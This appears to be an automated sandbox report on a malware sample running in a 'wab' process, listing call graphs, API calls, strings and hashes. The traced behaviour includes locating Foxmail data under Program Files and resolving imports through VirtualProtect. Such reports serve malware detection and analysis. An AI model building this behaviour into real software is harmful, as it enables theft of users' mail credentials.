lstrlenW 6336->6339 6364 352d1e16 6337->6364 6350 352d1e89 lstrlenW 6338->6350 6339->6338 6342 352d10ca 6345 352d1e89 5 API calls 6342->6345 6342->6348 6343 352d1088 GetFileAttributesW 6344 352d109c 6343->6344 6343->6348 6344->6348 6356 352d173a 6344->6356 6346 352d10df 6345->6346 6369 352d11ea 6346->6369 6348->6327 6351 352d2c40 6350->6351 6352 352d1ea7 lstrcatW lstrlenW 6351->6352 6353 352d1ed1 lstrcatW 6352->6353 6354 352d1ec2 6352->6354 6353->6343 6354->6353 6355 352d1ec7 lstrlenW 6354->6355 6355->6353 6357 352d1747 6356->6357 6384 352d1cca 6357->6384 6360 352d199f 6360->6348 6362 352d1824 6362->6360 6404 352d15da 6362->6404 6365 352d1e29 6364->6365 6368 352d1e4c 6364->6368 6366 352d1e2d lstrlenW 6365->6366 6365->6368 6367 352d1e3f lstrlenW 6366->6367 6366->6368 6367->6368 6368->6342 6370 352d120e 6369->6370 6371 352d1e89 5 API calls 6370->6371 6372 352d1220 GetFileAttributesW 6371->6372 6373 352d1235 6372->6373 6374 352d1246 6372->6374 6373->6374 6376 352d173a 35 API calls 6373->6376 6375 352d1e89 5 API calls 6374->6375 6377 352d1258 6375->6377 6376->6374 6378 352d10f1 56 API calls 6377->6378 6379 352d126d 6378->6379 6380 352d1e89 5 API calls 6379->6380 6381 352d127f 6380->6381 6382 352d10f1 56 API calls 6381->6382 6383 352d12e6 6382->6383 6383->6348 6385 352d1cf1 6384->6385 6386 352d1d0f CopyFileW CreateFileW 6385->6386 6387 352d1d55 GetFileSize 6386->6387 6388 352d1d44 DeleteFileW 6386->6388 6389 352d1ede 22 API calls 6387->6389 6393 352d1808 6388->6393 6390 352d1d66 ReadFile 6389->6390 6391 352d1d7d CloseHandle DeleteFileW 6390->6391 6392 352d1d94 CloseHandle DeleteFileW 6390->6392 6391->6393 6392->6393 6393->6360 6394 352d1ede 6393->6394 6396 352d222f 6394->6396 6397 352d224e 6396->6397 6399 352d2250 6396->6399 6412 352d474f 6396->6412 6417 352d47e5 6396->6417 6397->6362 6400 352d2908 6399->6400 6424 352d35d2 6399->6424 6401 352d35d2 RaiseException 6400->6401 6403 352d2925 6401->6403 6403->6362 6405 352d160c 6404->6405 6406 352d163c lstrlenW 6405->6406 6438 352d1c9d 6406->6438 6408 352d1655 lstrcatW lstrlenW 6409 352d1678 6408->6409 6410 352d167e lstrcatW 6409->6410 6411 352d1693 6409->6411 6410->6411 6411->6362 6427 352d4793 6412->6427 6414 352d2ada 5 API calls 6415 352d478f 6414->6415 6415->6396 6416 352d4765 6416->6414 6422 352d56d0 6417->6422 6418 352d570e 6419 352d6368 20 API calls 6418->6419 6421 352d570c 6419->6421 6420 352d56f9 RtlAllocateHeap 6420->6421 6420->6422 6421->6396 6422->6418 6422->6420 6423 352d474f 7 API calls 6422->6423 6423->6422 6426 352d35f2 RaiseException 6424->6426 6426->6400 6428 352d479f 6427->6428 6433 352d5671 RtlEnterCriticalSection 6428->6433 6430 352d47aa 6434 352d47dc 6430->6434 6432 352d47d1 6432->6416 6433->6430 6437 352d56b9 RtlLeaveCriticalSection 6434->6437 6436 352d47e3 6436->6432 6437->6436 6439 352d1ca6 6438->6439 6439->6408 7460 352d4a9a 7461 352d5411 38 API calls 7460->7461 7462 352d4aa2 7461->7462 7705 352d73d5 7706 352d73e1 7705->7706 7717 352d5671 RtlEnterCriticalSection 7706->7717 7708 352d73e8 7718 352d8be3 7708->7718 7710 352d73f7 7716 352d7406 7710->7716 7731 352d7269 GetStartupInfoW 7710->7731 7713 352d7417 7742 352d7422 7716->7742 7717->7708 7719 352d8bef 7718->7719 7720 352d8bfc 7719->7720 7721 352d8c13 7719->7721 7722 352d6368 20 API calls 7720->7722 7745 352d5671 RtlEnterCriticalSection 7721->7745 7724 352d8c01 7722->7724 7725 352d62ac 26 API calls 7724->7725 7726 352d8c0b 7725->7726 7726->7710 7727 352d8c4b 7753 352d8c72 7727->7753 7728 352d8c1f 7728->7727 7746 352d8b34 7728->7746 7732 352d7318 7731->7732 7733 352d7286 7731->7733 7737 352d731f 7732->7737 7733->7732 7734 352d8be3 27 API calls 7733->7734 7735 352d72af 7734->7735 7735->7732 7736 352d72dd GetFileType 7735->7736 7736->7735 7738 352d7326 7737->7738 7739 352d7369 GetStdHandle 7738->7739 7740 352d73d1 7738->7740 7741 352d737c GetFileType 7738->7741 7739->7738 7740->7716 7741->7738 7757 352d56b9 RtlLeaveCriticalSection 7742->7757 7744 352d7429 7744->7713 7745->7728 7747 352d637b 20 API calls 7746->7747 7748 352d8b46 7747->7748 7750 352d5eb7 11 API calls 7748->7750 7752 352d8b53 7748->7752 7749 352d571e 20 API calls 7751 352d8ba5 7749->7751 7750->7748 7751->7728 7752->7749 7756 352d56b9 RtlLeaveCriticalSection 7753->7756 7755 352d8c79 7755->7726 7756->7755 7757->7744 7758 352d4ed7 7759 352d6d60 51 API calls 7758->7759 7760 352d4ee9 7759->7760 7769 352d7153 GetEnvironmentStringsW 7760->7769 7764 352d571e 20 API calls 7766 352d4f29 7764->7766 7765 352d4eff 7767 352d571e 20 API calls 7765->7767 7768 352d4ef4 7767->7768 7768->7764 7770 352d716a 7769->7770 7780 352d71bd 7769->7780 7771 352d7170 WideCharToMultiByte 7770->7771 7774 352d718c 7771->7774 7771->7780 7772 352d4eee 7772->7768 7781 352d4f2f 7772->7781 7773 352d71c6 FreeEnvironmentStringsW 7773->7772 7775 352d56d0 21 API calls 7774->7775 7776 352d7192 7775->7776 7777 352d7199 WideCharToMultiByte 7776->7777 7778 352d71af 7776->7778 7777->7778 7779 352d571e 20 API calls 7778->7779 7779->7780 7780->7772 7780->7773 7782 352d4f44 7781->7782 7783 352d637b 20 API calls 7782->7783 7789 352d4f6b 7783->7789 7784 352d571e 20 API calls 7786 352d4fe9 7784->7786 7785 352d4fcf 7785->7784 7786->7765 7787 352d637b 20 API calls 7787->7789 7788 352d4fd1 7791 352d5000 20 API calls 7788->7791 7789->7785 7789->7787 7789->7788 7790 352d544d 26 API calls 7789->7790 7793 352d4ff3 7789->7793 7796 352d571e 20 API calls 7789->7796 7790->7789 7792 352d4fd7 7791->7792 7794 352d571e 20 API calls 7792->7794 7795 352d62bc 11 API calls 7793->7795 7794->7785 7797 352d4fff 7795->7797 7796->7789 7164 352d5351 7165 352d5374 7164->7165 7166 352d5360 7164->7166 7167 352d571e 20 API calls 7165->7167 7166->7165 7168 352d571e 20 API calls 7166->7168 7169 352d5386 7167->7169 7168->7165 7170 352d571e 20 API calls 7169->7170 7171 352d5399 7170->7171 7172 352d571e 20 API calls 7171->7172 7173 352d53aa 7172->7173 7174 352d571e 20 API calls 7173->7174 7175 352d53bb 7174->7175 7463 352d3c90 RtlUnwind 7798 352d36d0 7799 352d36e2 7798->7799 7801 352d36f0 7798->7801 7800 352d2ada 5 API calls 7799->7800 7800->7801

                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                    Function 352D10F1 Relevance: 12.1, APIs: 8, Instructions: 88stringfileCOMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 352D1137
                                                                                                                                                                                                                    • lstrcatW.KERNEL32(?,?), ref: 352D1151
                                                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 352D115C
                                                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 352D116D
                                                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 352D117C
                                                                                                                                                                                                                    • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,?,?,00000002,00000000), ref: 352D1193
                                                                                                                                                                                                                    • FindNextFileW.KERNELBASE(00000000,00000010), ref: 352D11D0
                                                                                                                                                                                                                    • FindClose.KERNELBASE(00000000), ref: 352D11DB
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000007.00000002.54485798339.00000000352D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 352D0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000007.00000002.54485770862.00000000352D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000007.00000002.54485798339.00000000352E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_352d0000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1083526818-0
                                                                                                                                                                                                                    • Opcode ID: bbfaf2ee0aae4cbe4cb31c4f05ab27ce55c981b124cb63d854ede3aa830f8f43
                                                                                                                                                                                                                    • Instruction ID: 104c4266a967103728c9eab3001f0eddae0f3c3e723df2ef3fd3905689fe072d
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bbfaf2ee0aae4cbe4cb31c4f05ab27ce55c981b124cb63d854ede3aa830f8f43
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BE217372944349ABD710EA64DC4CF9BBBECEF84325F50092AB968D31D0EB70D6058796
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 03DB916E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57sleepCOMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 127 3db916e-3db91ab 128 3db91ad-3db91b9 call 3db933b 127->128 130 3db91bb 128->130 131 3db91c0-3db91d0 128->131 130->131 132 3db91df-3db922d NtProtectVirtualMemory call 3db933b 131->132 133 3db91d2-3db91d7 Sleep 131->133 135 3db9232-3db9243 132->135 133->127 135->127
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • Sleep.KERNELBASE(00000005), ref: 03DB91D4
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000007.00000002.54465873469.0000000003BC8000.00000040.00000400.00020000.00000000.sdmp, Offset: 03BC8000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_3bc8000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Sleep
                                                                                                                                                                                                                    • String ID: |XlO
                                                                                                                                                                                                                    • API String ID: 3472027048-1294583706
                                                                                                                                                                                                                    • Opcode ID: 59f1cf275b04146e9f84399734263923a4d8de607fbdf56483de8552eade99e3
                                                                                                                                                                                                                    • Instruction ID: 5ee4a19db42c7ba76181f76836f1c0fe5d1b68b2663ce5adbafccdf3ed1e558a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 59f1cf275b04146e9f84399734263923a4d8de607fbdf56483de8552eade99e3
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 691133B1A45341CFEB509F7485ACB8AB7B4AF14391F464189EE528B1B6C334C5848F12
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 352D12EE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 243stringCOMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 352D1434
                                                                                                                                                                                                                      • Part of subcall function 352D10F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 352D1137
                                                                                                                                                                                                                      • Part of subcall function 352D10F1: lstrcatW.KERNEL32(?,?), ref: 352D1151
                                                                                                                                                                                                                      • Part of subcall function 352D10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 352D115C
                                                                                                                                                                                                                      • Part of subcall function 352D10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 352D116D
                                                                                                                                                                                                                      • Part of subcall function 352D10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 352D117C
                                                                                                                                                                                                                      • Part of subcall function 352D10F1: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,?,?,00000002,00000000), ref: 352D1193
                                                                                                                                                                                                                      • Part of subcall function 352D10F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 352D11D0
                                                                                                                                                                                                                      • Part of subcall function 352D10F1: FindClose.KERNELBASE(00000000), ref: 352D11DB
                                                                                                                                                                                                                    • lstrlenW.KERNEL32(?), ref: 352D14C5
                                                                                                                                                                                                                    • lstrlenW.KERNEL32(?), ref: 352D14E0
                                                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?), ref: 352D150F
                                                                                                                                                                                                                    • lstrcatW.KERNEL32(00000000), ref: 352D1521
                                                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?), ref: 352D1547
                                                                                                                                                                                                                    • lstrcatW.KERNEL32(00000000), ref: 352D1553
                                                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?), ref: 352D1579
                                                                                                                                                                                                                    • lstrcatW.KERNEL32(00000000), ref: 352D1585
                                                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?), ref: 352D15AB
                                                                                                                                                                                                                    • lstrcatW.KERNEL32(00000000), ref: 352D15B7
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000007.00000002.54485798339.00000000352D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 352D0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000007.00000002.54485770862.00000000352D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000007.00000002.54485798339.00000000352E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_352d0000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                                                                                                                                                                                    • String ID: )$Foxmail$ProgramFiles
                                                                                                                                                                                                                    • API String ID: 672098462-2938083778
                                                                                                                                                                                                                    • Opcode ID: c9421599c4f15f9cd7321766f83b499a99bf06b99cc33594a8718f72a5b049fe
                                                                                                                                                                                                                    • Instruction ID: 766407a8e30143b0840bd5de4652fe5340e67bb8c8ce2734afd7e83f41fe726f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c9421599c4f15f9cd7321766f83b499a99bf06b99cc33594a8718f72a5b049fe
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AB81A171A4039CA9DB20DBA1DC45FEEB37DEF84710F4005AAF908E7190EA715A85CF95
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 352DC7E6 Relevance: 9.1, APIs: 6, Instructions: 65libraryloaderCOMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(352DC7DD), ref: 352DC7E6
                                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(?,352DC7DD), ref: 352DC838
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 352DC860
                                                                                                                                                                                                                      • Part of subcall function 352DC803: GetProcAddress.KERNEL32(00000000,352DC7F4), ref: 352DC804
                                                                                                                                                                                                                      • Part of subcall function 352DC803: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,352DC7F4,352DC7DD), ref: 352DC816
                                                                                                                                                                                                                      • Part of subcall function 352DC803: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,352DC7F4,352DC7DD), ref: 352DC82A
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000007.00000002.54485798339.00000000352D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 352D0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000007.00000002.54485770862.00000000352D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000007.00000002.54485798339.00000000352E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_352d0000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2099061454-0
                                                                                                                                                                                                                    • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                                                    • Instruction ID: fc228c6005d23567a47f57baa70ffcc659bc2bb8329fea5f3702bcdfa565d12e
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C1016D50A493C23CBB1392744C04DBADFEDAB176A0B100756E075F7093CDA08502C3F5
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 352DC7A7 Relevance: 7.6, APIs: 5, Instructions: 100libraryloaderCOMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 79 352dc7a7-352dc7bc 80 352dc82d 79->80 81 352dc7be-352dc7c6 79->81 83 352dc82f-352dc833 80->83 81->80 82 352dc7c8-352dc7f6 call 352dc7e6 81->82 91 352dc86c-352dc86e 82->91 92 352dc7f8 82->92 84 352dc835-352dc83d GetModuleHandleA 83->84 85 352dc872 call 352dc877 83->85 87 352dc83f-352dc847 84->87 87->87 90 352dc849-352dc84c 87->90 90->83 93 352dc84e-352dc850 90->93 94 352dc866-352dc86b 91->94 95 352dc870 91->95 96 352dc85b-352dc85e 92->96 97 352dc7fa-352dc7fe 92->97 98 352dc856-352dc85a 93->98 99 352dc852-352dc854 93->99 94->91 95->90 100 352dc85f-352dc860 GetProcAddress 96->100 102 352dc865 97->102 103 352dc800-352dc80b GetProcAddress 97->103 98->96 99->100 100->102 102->94 103->80 104 352dc80d-352dc81a VirtualProtect 103->104 105 352dc82c 104->105 106 352dc81c-352dc82a VirtualProtect 104->106 105->80 106->105
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(?,352DC7DD), ref: 352DC838
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 352DC860
                                                                                                                                                                                                                      • Part of subcall function 352DC7E6: GetModuleHandleA.KERNEL32(352DC7DD), ref: 352DC7E6
                                                                                                                                                                                                                      • Part of subcall function 352DC7E6: GetProcAddress.KERNEL32(00000000,352DC7F4), ref: 352DC804
                                                                                                                                                                                                                      • Part of subcall function 352DC7E6: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,352DC7F4,352DC7DD), ref: 352DC816
                                                                                                                                                                                                                      • Part of subcall function 352DC7E6: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,352DC7F4,352DC7DD), ref: 352DC82A
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000007.00000002.54485798339.00000000352D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 352D0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000007.00000002.54485770862.00000000352D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000007.00000002.54485798339.00000000352E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_352d0000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2099061454-0
                                                                                                                                                                                                                    • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                                                                    • Instruction ID: 5d54e7991b6c4352c931a53600b4af29a6da5b7f8592dbd19d6c22903bbb2942
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3A213B6555D3C26FF71387B44C04FA5FFD9AB172A0F184696D064EB143D6A48845C3A1
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 352DC803 Relevance: 7.6, APIs: 5, Instructions: 54librarymemoryloaderCOMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 107 352dc803-352dc80b GetProcAddress 108 352dc82d 107->108 109 352dc80d-352dc81a VirtualProtect 107->109 112 352dc82f-352dc833 108->112 110 352dc82c 109->110 111 352dc81c-352dc82a VirtualProtect 109->111 110->108 111->110 113 352dc835-352dc83d GetModuleHandleA 112->113 114 352dc872 call 352dc877 112->114 115 352dc83f-352dc847 113->115 115->115 117 352dc849-352dc84c 115->117 117->112 118 352dc84e-352dc850 117->118 119 352dc856-352dc85e 118->119 120 352dc852-352dc854 118->120 121 352dc85f-352dc865 GetProcAddress 119->121 120->121 124 352dc866-352dc86e 121->124 126 352dc870 124->126 126->117
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,352DC7F4), ref: 352DC804
                                                                                                                                                                                                                    • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,352DC7F4,352DC7DD), ref: 352DC816
                                                                                                                                                                                                                    • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,352DC7F4,352DC7DD), ref: 352DC82A
                                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(?,352DC7DD), ref: 352DC838
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 352DC860
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000007.00000002.54485798339.00000000352D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 352D0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000007.00000002.54485770862.00000000352D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000007.00000002.54485798339.00000000352E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_352d0000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressProcProtectVirtual$HandleModule
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2152742572-0
                                                                                                                                                                                                                    • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                                                                    • Instruction ID: aa31d9a7952967ece6e97d3c95d5eea0b883116431badd1d7f470b703b23d418
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 56F04684A893C23CFA1341B40C44EB6DFDD9B272A0B100A12F039E7183CCA0890683F2
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 352D571E Relevance: 3.0, APIs: 2, Instructions: 22memoryCOMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 136 352d571e-352d5727 137 352d5729-352d573c RtlFreeHeap 136->137 138 352d5756-352d5757 136->138 137->138 139 352d573e-352d5755 call 352d6368 GetLastError call 352d62ef 137->139 139->138
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • RtlFreeHeap.NTDLL(00000000,00000000,?,352D924F,?,00000000,?,00000000,?,352D9276,?,00000007,?,?,352D7E5A,?), ref: 352D5734
                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,352D924F,?,00000000,?,00000000,?,352D9276,?,00000007,?,?,352D7E5A,?,?), ref: 352D5746
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000007.00000002.54485798339.00000000352D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 352D0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000007.00000002.54485770862.00000000352D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000007.00000002.54485798339.00000000352E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_352d0000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 485612231-0
                                                                                                                                                                                                                    • Opcode ID: d3fe541f40d63d2b8c33e3785d82c5e57e14c015f53e13a511bd75b8c17dd0ac
                                                                                                                                                                                                                    • Instruction ID: 6adcc4bc75381c18ffb9244e2f59c89d42c25b8f7b88d52871784b896c8e1c9a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d3fe541f40d63d2b8c33e3785d82c5e57e14c015f53e13a511bd75b8c17dd0ac
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A5E08631A10605EBE7102FE0E84CB897FE9BB40792F500024F62CA6090DA709441C784
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                                    Function 352D2639 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 352D2645
                                                                                                                                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,00000017), ref: 352D2710
                                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,00000017), ref: 352D2730
                                                                                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,00000017), ref: 352D273A
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000007.00000002.54485798339.00000000352D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 352D0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000007.00000002.54485770862.00000000352D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000007.00000002.54485798339.00000000352E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_352d0000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 254469556-0
                                                                                                                                                                                                                    • Opcode ID: d67deb2e2fe65ae0f1ab093548c85438a7adb587ba3332b428a50ab9add73bec
                                                                                                                                                                                                                    • Instruction ID: 5fd298c62d95c40fa9f3427a816ecab1bac9a11e257c7d0907381975d275141c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d67deb2e2fe65ae0f1ab093548c85438a7adb587ba3332b428a50ab9add73bec
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BD310775D452189BEB50DFA4D989BCDFBF8AF08300F1040AAE51CAB250EB719A86CF45
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 352D2264 Relevance: 6.0, APIs: 4, Instructions: 25timethreadCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 352D2276
                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 352D2285
                                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 352D228E
                                                                                                                                                                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 352D229B
                                                                                                                                                                                                                    Memory Dump Source
